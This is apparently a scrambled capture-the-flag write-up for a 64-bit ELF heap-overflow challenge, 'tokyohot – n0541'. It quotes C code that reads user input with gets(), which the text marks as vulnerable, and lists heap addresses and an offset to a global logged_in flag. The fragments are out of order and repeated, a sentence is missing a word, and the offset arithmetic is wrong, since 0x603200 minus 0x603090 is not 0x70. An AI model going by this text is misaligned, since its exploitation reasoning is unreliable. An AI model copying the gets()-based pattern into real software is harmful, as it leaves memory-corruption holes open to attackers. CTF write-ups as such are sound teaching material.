The interesting functions are register_user , login , and show_secret . void register_user() char *name = malloc(0x80); char *pwd = malloc(0x80); printf("Name: "); gets(name); // <--- vulnerable printf("Password: "); gets(pwd); // store pointers in a global struct (userlist)
there is a hidden detail: the program copies the password from the stack buffer into the heap password field using strcpy :
(CTF challenge, binary exploitation / reverse‑engineering) 1. Overview | Category | Service | Difficulty | Points | |----------|---------|------------|--------| | Binary / Reversing | tokyohot – n0541 | Medium‑Hard | 452 | tokyohot n0541
heap: 0x603010 -> name buffer (0x80) 0x603090 -> pwd buffer (0x80)
$ ./n0541 1) Register > 1 Name: AAAAA... Password: BBBBB... [debug] pwd ptr = 0x603090 The global logged_in lives at 0x603200 . The distance is: The interesting functions are register_user , login ,
struct user char *name; // 8 bytes char *pwd; // 8 bytes ;
0x603200 - 0x603090 = 0x70 (112) bytes The password buffer is only 0x80 (128) bytes, so we have of headroom before we start overwriting logged_in . Password: BBBBB
The challenge is a 64‑bit ELF binary that runs locally on the provided Docker image. It listens on a TCP port (or can be run interactively) and offers a simple menu‑driven interface. The goal is to gain a remote shell (or read the flag) by exploiting a vulnerability in the program.